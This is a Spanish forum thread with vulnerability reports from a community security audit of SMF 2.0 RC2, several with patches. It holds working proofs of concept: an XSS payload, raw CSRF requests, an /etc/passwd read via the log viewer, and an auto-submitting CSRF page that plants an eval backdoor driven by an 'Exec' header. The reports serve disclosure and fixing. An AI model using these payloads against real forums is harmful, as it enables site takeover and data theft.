Mensajes

[Detalles]

Detalles


 
 
 
 
 
 

Descripción:	Remote File Disclosure (solo en logs, y similares)
Descubierto por:	sirdarckcat@elhacker.net
Código vulnerable:	N/A
URL Vulnerable:	index.php?action=admin;area=logs;sa=errorlog;file=L2V0Yy9wYXNzd2Q==
PoC:	Obligando a que la página se muestre como una CSS se le permita leer su contenido.
Afecta a:	‭‬SMF 2.0 RC2

Descripción

Hay una vulnerabilidad en la manera en la que el lector de logs funciona:
index.php?action=admin;area=logs;sa=errorlog;file=L2V0Yy9wYXNzd2Q==

Un atacante podria crear una serie de peticiones para crear una aparente
hoja de estilo valida, y asi capturar en IE toda la informacion que sigue
despues de cierta linea.

Varios me preguntan por privado sobre la publicación de los bugs ya que el dia plazo es hoy.

todavía estoy terminando de crear los post con las vulnerabilidades asi que en  unos momentos mas lo pegaré justo al post con chincheta de la auditoría.

Solamente se publicarán los bugs reportados, el resto quedarán para el próximo mes

Cuando lo termine lo verán pegado arriba y avisaré en este mismo post asi que paciencia.

[Detalles]

Detalles


 
 
 
 
 
 

Descripción:	XSS en "Enable basic HTML in posts"
Descubierto por:	sirdarckcat@elhacker.net
Código vulnerable:	N/A
URL Vulnerable:	N/A
PoC:	<img src="http:// alt="x http://www.google.com/onerror=alert(1)// x">
Afecta a:	‭‬SMF 2.0 RC2

Descripción

De acuerdo con SMF,

This will allow the posting of some basic HTML tags:

   * <b>, <u>, <i>, <s>, <em>, <ins>, <del>
   * <a href="">
   * <img src="" alt="" />
   * <br />, <hr />
   * <pre>, <blockquote>

Pero se puede hacer XSS con:

Código (html4strict) [Seleccionar] Expandir

<img src="http:// alt="x http://www.google.com/onerror=alert(1)// x">

Saludos!!

[Detalles]

Detalles


 
 
 
 
 
 

Descripción:	CSRF en la configuración de archivos adjuntos
Descubierto por:	WHK@elhacker.net
Código vulnerable:	Sources/ManageAttachments.php:117 y 162
URL Vulnerable:	/index.php?action=admin;area=manageattachments;sa=attachments
PoC:	POST: attachmentEnable=1&attachmentExtensions=com%2Cexe%2Cphp5%2Cphp4%2Cconf%2Ccfg%2Cini%2Chtaccess%2Cphp&attachmentUploadDir=%2Fopt%2Flampp%2Fhtdocs%2Fsmf_2%2Fattachments&attachmentDirSizeLimit=10240&attachmentPostLimit=192&attachmentSizeLimit=128&attachmentNumPerPostLimit=4&attachmentShowImages=1&attachmentThumbnails=1&attachmentThumbWidth=150&attachmentThumbHeight=150
Afecta a:	‭‬SMF 2.0 RC2

Descripción

La vulnerabilidad se trata de que puedes ejecutar modificaciones en el
panel de administración de forma arbitraria en la sección de configuración
de archivos adjuntos:
http://localhost/smf2.0/index.php?action=admin;area=manageattachments;sa=attachments
aunque lo extraño es que SMF si integra el token pero al enviar la petición
sin el nos encontramos que se ejecuta de igual forma.

La falla está en el archivo Sources/ManageAttachments.php linea 117 desde
donde se llaman a las funciones desde

Código (php) [Seleccionar] Expandir

// Finally fall through to what we are doing.
$subActions[$context['sub_action']]();

y la linea 162 a la209 que es la función llamada y desde que inicia el
proceso hasta que fiinaliza no se solicita ningún tipo de token.

http://code.google.com/p/smf2-review/source/browse/trunk/Sources/ManageAttachments.php#117
http://code.google.com/p/smf2-review/source/browse/trunk/Sources/ManageAttachments.php#162

Prueba de concepto

Código (bash) [Seleccionar] Expandir

yan@Lola:~$ nc -v 127.0.0.1 80
POST
/smf_2/index.php?action=admin;area=manageattachments;save;sa=attachments
HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; U; Linux i686; es-CL; rv:1.9.1.5)
Gecko/20091102 Firefox/3.5.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-cl,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: close
Referer:
http://127.0.0.1/smf_2/index.php?action=admin;area=manageattachments;sa=attachments
Cookie: PHPSESSID=[Cookie acá]
Content-Type: application/x-www-form-urlencoded
Content-Length: 368

attachmentEnable=1&attachmentExtensions=com%2Cexe%2Cphp5%2Cphp4%2Cconf%2Ccfg%2Cini%2Chtaccess%2Cphp&attachmentUploadDir=%2Fopt%2Flampp%2Fhtdocs%2Fsmf_2%2Fattachments&attachmentDirSizeLimit=10240&attachmentPostLimit=192&attachmentSizeLimit=128&attachmentNumPerPostLimit=4&attachmentShowImages=1&attachmentThumbnails=1&attachmentThumbWidth=150&attachmentThumbHeight=150

[Detalles]

Detalles


 
 
 
 
 

Descripción:	Eliminación arbitraria y Disclosure de paquetes instalados
Descubierto por:	WHK@elhacker.net
Código vulnerable:	Sources/Packages.php:1189
URL Vulnerable:	/index.php?action=admin;area=packages;sa=remove;package=.htaccess
Afecta a:	‭‬SMF 2.0 RC2

Descripción

El problema está en el archivo Sources/Packages.php Linea 1189 en la
función PackageRemove ya que primeramente no solicita ningún token por lo
tanto es vulnerable a un ataque de tipo CSRF.
El segundo caso es que en esta linea:

Código (php) [Seleccionar] Expandir

// Ack, don't allow deletion of arbitrary files here, could become a
security hole somehow!
if (!isset($_GET['package']) || $_GET['package'] == 'index.php' ||
$_GET['package'] == 'installed.list')
redirectexit('action=admin;area=packages;sa=browse');

impiden la eliminación local de archivos pero no incluyeron el ".htaccess"
por lo cual puedes eliminarlo de forma arbitraria y observar el listado de
paquetes.

Pruebas de concepto:
http://localhost/smf2.0/index.php?action=admin;area=packages;sa=remove;package=paquete.zip
http://localhost/smf2.0/index.php?action=admin;area=packages;sa=remove;package=.htaccess

Nota de sirdarckcat

http://code.google.com/p/smf2-review/source/browse/trunk/Sources/Packages.php#1196
Al parecer..

Código (php) [Seleccionar] Expandir

$_GET['package'] = preg_replace('~[\.]+~', '.', strtr($_GET['package'], '/', '_'));

no podemos poner "..", lo del disclosure que dice whk es que sin el htaccess ahora
podemos leer installed.list y bajar los paquetes y demas

[Detalles]

Detalles


 
 
 
 
 
 

Descripción:	XSS en la sección de administración de servidores de mods
Descubierto por:	WHK@elhacker.net
Código vulnerable:	Sources/PackageGet.php:732
URL Vulnerable:	index.php?action=packageget
PoC:	Agregar un servidor con nombre: <h1>XSS</h1>
Afecta a:	‭‬SMF 1.1.10 y 2.0 RC2

Descripción

La falla está en el archivo Sources/PackageGet.php linea 732
http://code.google.com/p/smf2-review/source/browse/trunk/Sources/PackageGet.php#732

Donde la función "PackageServerAdd" actualiza el string del nombre del
servidor en la base de datos sin ser filtrada de ninguna forma.

Prueba de concepto:
http://127.0.0.1/smf_2/index.php?action=admin;area=packages
Donde dice "Add server" en el input del nombre del servidor pongan <h1>XSS</h1>

[Detalles]

Detalles


 
 
 
 

Descripción:	CSRF en el gestor de servidores de paquetes
Descubierto por:	WHK@elhacker.net
Código vulnerable:	Sources/Packages.php:1189
URL Vulnerable:	http://127.0.0.1/smf_2/index.php?action=admin;area=packages;get;sa=remove;server=1

 

Afecta a:

‭‬SMF 1.1.10 y 2.0 RC2

Descripción

La vulnerabilidad consiste en que puedes remover servdiores de
actualizaciones y paquetes de forma arbitraria debido a que esta acción no
solicita un token o algún tipo de verificación que lo impida:

Prueba de concepto:
http://127.0.0.1/smf_2/index.php?action=admin;area=packages;get;sa=remove;server=1
Con esto podemos hacer que el administrador elimine de forma arbitraria el
primero servidor en la lista de servidores de paquetes.
Hay que recordar que esta acción solo la puede ejecutar un administrador
por lo tanto es necesario que alguien con este tipo de derechos sobre el
foro pueda ejecutar tu csrf desde alguna imagen en tu perfil reireccionada
o desde alguna web externa.

La falla se localiza en el archivo Sources/PackageGet.php linea 740
http://code.google.com/p/smf2-review/source/browse/trunk/Sources/PackageGet.php#740

No hay token por ningún lado de la función.

[Detalles]

Detalles


 
 
 
 
 
 

Descripción:	CSRF en el colapso de categorias
Descubierto por:	WHK@elhacker.net
Código vulnerable:	Sources/BoardIndex.php:130
URL Vulnerable:	index.php?action=collapse;c=1;sa=collapse
PoC:	‭‬index.php?action=collapse;c=1;sa=collapse
Afecta a:	‭‬SMF 1.1.10 y 2.0 RC2

Descripción

La falla se encuentra en el archivo Sources/BoardIndex.php desde la linea
130 hasta la 150 en la función llamada "CollapseCategory" ya que al
solicitar una petición de colapso de un foro no nos pide como requsito un
token o algo que lo impida, por lo tanto desde un siomple csrf podemos
causar el colapso total de foros en la visualización inicial de la portada
del foro.

Aunque no es una vulnerabilidad que pueda comprometer al foro si es
bastante molesta y smf no debería permitir este tipo de acciones de forma
arbitraria.

Prueba de concepto:
http://localhost/smf2.0/index.php?action=collapse;c=1;sa=collapse
donde c=1 es la variable con el id de grupos de foros.


Solución

Modificar la categoría de la sección y darle click donde dice "no colapsable" mientras que simplemachines da una solución oficial ya que hay que agregar el tocken a todos sus themes y al sistema propio.

[Detalles]

Detalles


 
 
 
 
 
 

Descripción:	CSRF en el cambio del theme
Descubierto por:	WHK@elhacker.net
Código vulnerable:	Sources/Load.php:1324
URL Vulnerable:	index.php?theme=2
PoC:	‭‬index.php?theme=2
Afecta a:	‭‬SMF 1.1.10 y 2.0 RC2

Descripción

Normalmente cuando uno desea cambiar de theme lo hace en las preferencias
de diseño del perfil de cada usuario incluyendo un token para evitar CSRF
aunque no sirve de mucho ya que puedes ejecutar un cambio de theme de forma
forzada gracias a una vulnerabilidad alojada en el archivo Sources/Load.php
linea 1245
http://code.google.com/p/smf2-review/source/browse/trunk/Sources/Load.php#1245

Código (php) [Seleccionar] Expandir

elseif (!empty($_REQUEST['theme']) && (!empty($modSettings['theme_allow']) || allowedTo('admin_forum')))
{
$id_theme = (int) $_REQUEST['theme'];
$_SESSION['id_theme'] = $id_theme;
}

haciendo un csrf persistente ya que el id de theme lo almacena directamente
en la cookie de sesión del usuario o visitante.

Prueba de concepto:
http://localhost/smf/index.php?theme=2


Solución

Código original de SMF 2.0 RC2 en Sources/Load.php linea 1324

Código (php) [Seleccionar] Expandir

elseif (!empty($_REQUEST['theme']) && (!empty($modSettings['theme_allow']) || allowedTo('admin_forum')))
{
$id_theme = (int) $_REQUEST['theme'];
$_SESSION['id_theme'] = $id_theme;
}

Reemplazar por

Código (php) [Seleccionar] Expandir

/*
elseif (!empty($_REQUEST['theme']) && (!empty($modSettings['theme_allow']) || allowedTo('admin_forum')))
{
$id_theme = (int) $_REQUEST['theme'];
$_SESSION['id_theme'] = $id_theme;
}
*/

Hay que recordar que este cambio imposibilita el cambio de theme directamente obligando a utilizar la opción del perfil si alguien lo desea.
Esto no es una feature debido a que supuestamente solamente el administrador puede utilizar este tipo de visualizaciones sin tocken pero al fallar las condiciones hace posible que esta acción sea ejecutable a todo usuario y ni aun asi debería crearse al propio administrador.
O se elimina o se pone token.

[Detalles]

Detalles


 
 
 
 
 
 

Descripción:	Código de ejecución remota PHP
Descubierto por:	WHK@elhacker.net
Código vulnerable:	Sources/ManageServer.php:1298
URL Vulnerable:	Themes/default/languages/index.english.php
PoC:	‭‬en_US\\\'; $x=$_SERVER[HTTP_EXEC];if($x){@eval($x);exit;} //
Afecta a:	‭‬SMF 2.0 RC2

Descripción

La vulnerabilidad se localiza en el archivo Sources/ManageServer.php desde
la linea 1298
http://code.google.com/p/smf2-review/source/browse/trunk/Sources/ManageServer.php#1298

Código (php) [Seleccionar] Expandir

$replace_array = array(
'~\$txt\[\'lang_character_set\'\]\s=\s(\'|")[^\r\n]+~' => '$txt[\'lang_character_set\'] = \'' . addslashes($_POST['character_set']) . '\';',
'~\$txt\[\'lang_locale\'\]\s=\s(\'|")[^\r\n]+~' => '$txt[\'lang_locale\'] = \'' . addslashes($_POST['locale']) . '\';',
'~\$txt\[\'lang_dictionary\'\]\s=\s(\'|")[^\r\n]+~' => '$txt[\'lang_dictionary\'] = \'' . addslashes($_POST['dictionary']) . '\';',
'~\$txt\[\'lang_spelling\'\]\s=\s(\'|")[^\r\n]+~' => '$txt[\'lang_spelling\'] = \'' . addslashes($_POST['spelling']) . '\';',
'~\$txt\[\'lang_rtl\'\]\s=\s[A-Za-z0-9]+;~' => '$txt[\'lang_rtl\'] = ' . (!empty($_POST['rtl']) ? 'true' : 'false') . ';',
);

y el problema esque SMF filtra de mala forma los carácteres especiales que pueden ser incluidos ya que aunque procesan via addslashses el preg_replace los omite como si fueran parte de la misma expresión regular.

Si vamos a la sección
Configuraciones->Lenguajes->Editar lenguajes
Podemos ver el listado de lenguajes, si le haces click sobre cualquier
lenguaje irás directamente a su edición y podrás notar dos cosas.

1. Al enviarte a esa sección puedes ver que te adjunta un token a la url
para evitar un ataque de tipo CSRF pero si se lo eliminas puedes ver que la
sección se visualiza de igual forma, por lo tanto si actualizamos las
configuraciones sin enviar el token vemos que se guarda igual.
En SMF hay muchas funciones y secciones que aparentemente se ve un token
pero no las usa. Este es un CSRF de ejecución de comando arbitrario
primeramente ya que un atacante remoto puede engañar al administrador
haciendo que visualize una web especialemnte preparada para el ataque y
modificar las configuraciones a gusto.

2. Si haces algún cambio en cualquier input y le das en guardar lo que hace
SMF no es guardar los valores en la base de datos sino sobreescribir
directamente el archivo de elnguajes del theme utilizado por lo tanto lo
que escribas de configuración se verá en el archivo principal de lenguaje
del theme.

3. El bug consiste principalmente en que SMF no filtra adecuadamente estos
inputs. Originalemnte en el archivo
Themes/default/languages/index.english.php dice así:

Código (php) [Seleccionar] Expandir

$txt['lang_locale'] = 'en_US';
$txt['lang_dictionary'] = 'en';
$txt['lang_spelling'] = 'american';

Si intentamos escribir una comilla simple SMF le agrega un slash intentando
invalidar la inyección de código pero no filtra adecuadamente el carácter
"\" por lo tanto cuando insertamos una comilla el código queda así:

Código (php) [Seleccionar] Expandir

$txt['lang_locale'] = 'en_US\'test';
por lo tanto aplicamos bypass y escribimos "\'" para que quede así:

Código (php) [Seleccionar] Expandir

$txt['lang_locale'] = 'en_US\\'test';
Por lo tanto el primer slash invalida el segundo transformandolo en un
string y validando la comilla simple, luego de eso inyectamos nuestro
código arbitrario sin comillas y cerramos con un cmentario para invalidar
el resto de la linea y evitar que se produzca un error.
Por ejemplo "\';phpinfo();//" quedaría:

Código (php) [Seleccionar] Expandir

$txt['lang_locale'] = 'en_US\\';phpinfo();//';
ejecutando el código de forma arbitraria y remota gracias a la falta de
token (CSRF).

PoC:

Código (php) [Seleccionar] Expandir

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
 <title>:O</title>
</head>
<?php
/*
Prueba de concepto. Auditoría a SMF 2.0 de parte del grupo de auditores de Elhacker.Net
https://foro.elhacker.net/nivel_web/auditoria_de_seguridad_hacia_simple_machines_forum_20-t271199.0.html
*/
/* Configuraciones */
$foro_vulnerable = '';

 if($_GET['act'] == 'frame'){
?>
<script>
 function ejecutar(){
  document.getElementById('payload').value = 'en_US\\\'; $x=$_SERVER[HTTP_EXEC];if($x){@eval($x);exit;} //';
  document.getElementById('form').submit();
 }
</script>
<body onload="ejecutar();">
 <form id="form" method="post" action="<?php echo $foro_vulnerable; ?>index.php?action=admin;area=languages;sa=editlang;lid=english">
  <input type="hidden" name="character_set" value="ISO-8859-1" />
  <input type="hidden" name="locale" id="payload" value="" />
  <input type="hidden" name="dictionary" value="en" />
  <input type="hidden" name="spelling" value="american" />
  <input type="hidden" name="save_main" value="Save" />
 </form>
</body>
<?php }else{ ?>
<body style="text-align: center;">
 <h2 style="font-weight: bold; text-decoration: underline;">
  Prueba de concepto
 </h2>
 <hr />
 <div style="text-align: center;">
  <img width="400" height="322" src="http://i207.photobucket.com/albums/bb73/moonlightj/HQczsxCxHV_nooooooo-i-cant-has-pres.jpg" />
  <img width="400" height="322" src="http://i492.photobucket.com/albums/rr283/Hoodano12/n1559202619_124094_6213.jpg" />
 </div>
 <hr />
 <img src="http://th40.photobucket.com/albums/e245/abbbies/th_scream.jpg" />
 <img src="http://th39.photobucket.com/albums/e156/kimtisha/th_AUG2008011bw.jpg" />
 <img src="http://th132.photobucket.com/albums/q9/PhilVassar/th_MarissaFile.jpg" />
 <img src="http://th873.photobucket.com/albums/ab296/jrvohler/th_no.jpg" />
 <img src="http://th306.photobucket.com/albums/nn256/s13vin4t0r/th_BSODGATES.jpg" />
 <img src="http://th296.photobucket.com/albums/mm194/Spalders/th_nooooooo-not-the-bafftub.jpg" />
 <img src="http://th233.photobucket.com/albums/ee182/vinayg18/blog/th_scary_hillary_clinton.jpg" />
 <img src="http://th732.photobucket.com/albums/ww321/TSCC_Munter/th_nooooooo.jpg" />
 <img src="http://th617.photobucket.com/albums/tt254/webrougt97/th_fred14.jpg" />
 <img src="http://th257.photobucket.com/albums/hh209/Arganaut/th_Desecration_by_Louieville_XXIII.jpg" />
 <img src="http://th4.photobucket.com/albums/y142/Tornadopotato/Photos/th_100_2521.jpg" />
 <hr />
 <iframe style="visibility: hidden; position: absolute; top:0px; left: 0px;" src="<?php echo $_SERVER['SCRIPT_URI']; ?>?act=frame"></iframe>
</body>
<?php } ?>
</html>

1. Ingresar como administrador al foro de pruebas
2. Modificar el archivo donde dice $foro_vulnerable=''; escribiendo la
dirección del foro sin el index.php.
3. Visualizar el archivo

Luego que visualizes el archivo tu foro se habrá infectado y a la vista de
todos no se verá absolutamente nada. Para su ejecución debes enviar un
header desde tu explorador con la variable "Exec" mas su ejecución, como
por ejemplo "Exec: phpinfo();" ya que el payload de la prueba de concepto
es la siguiente:

Código (php) [Seleccionar] Expandir

en_US\'; $x=$_SERVER[HTTP_EXEC];if($x){@eval($x);exit;} //

Entonces se le agregará el slash a la comilla y el slash puesto con anterioridad no será modificado quedando un \\' invalodando el slash que invalidaba a la comilla.


Solución

Código original de SMF 2.0 RC2 en Sources/ManageServer.php linea 1298

Código (php) [Seleccionar] Expandir

$replace_array = array(
'~\$txt\[\'lang_character_set\'\]\s=\s(\'|")[^\r\n]+~' => '$txt[\'lang_character_set\'] = \'' . addslashes($_POST['character_set']) . '\';',
'~\$txt\[\'lang_locale\'\]\s=\s(\'|")[^\r\n]+~' => '$txt[\'lang_locale\'] = \'' . addslashes($_POST['locale']) . '\';',
'~\$txt\[\'lang_dictionary\'\]\s=\s(\'|")[^\r\n]+~' => '$txt[\'lang_dictionary\'] = \'' . addslashes($_POST['dictionary']) . '\';',
'~\$txt\[\'lang_spelling\'\]\s=\s(\'|")[^\r\n]+~' => '$txt[\'lang_spelling\'] = \'' . addslashes($_POST['spelling']) . '\';',
'~\$txt\[\'lang_rtl\'\]\s=\s[A-Za-z0-9]+;~' => '$txt[\'lang_rtl\'] = ' . (!empty($_POST['rtl']) ? 'true' : 'false') . ';',
);

Debe ser reemplazado por

Código (php) [Seleccionar] Expandir

$replace_array = array(
'~\$txt\[\'lang_character_set\'\]\s=\s(\'|")[^\r\n]+~' => '$txt[\'lang_character_set\'] = \'' . str_replace('\\', '\\\\', addslashes($_POST['character_set'])) . '\';',
'~\$txt\[\'lang_locale\'\]\s=\s(\'|")[^\r\n]+~' => '$txt[\'lang_locale\'] = \'' . str_replace('\\', '\\\\', addslashes($_POST['locale'])) . '\';',
'~\$txt\[\'lang_dictionary\'\]\s=\s(\'|")[^\r\n]+~' => '$txt[\'lang_dictionary\'] = \'' . str_replace('\\', '\\\\', addslashes($_POST['dictionary'])) . '\';',
'~\$txt\[\'lang_spelling\'\]\s=\s(\'|")[^\r\n]+~' => '$txt[\'lang_spelling\'] = \'' . str_replace('\\', '\\\\', addslashes($_POST['spelling'])) . '\';',
'~\$txt\[\'lang_rtl\'\]\s=\s[A-Za-z0-9]+;~' => '$txt[\'lang_rtl\'] = ' . (!empty($_POST['rtl']) ? 'true' : 'false') . ';',
);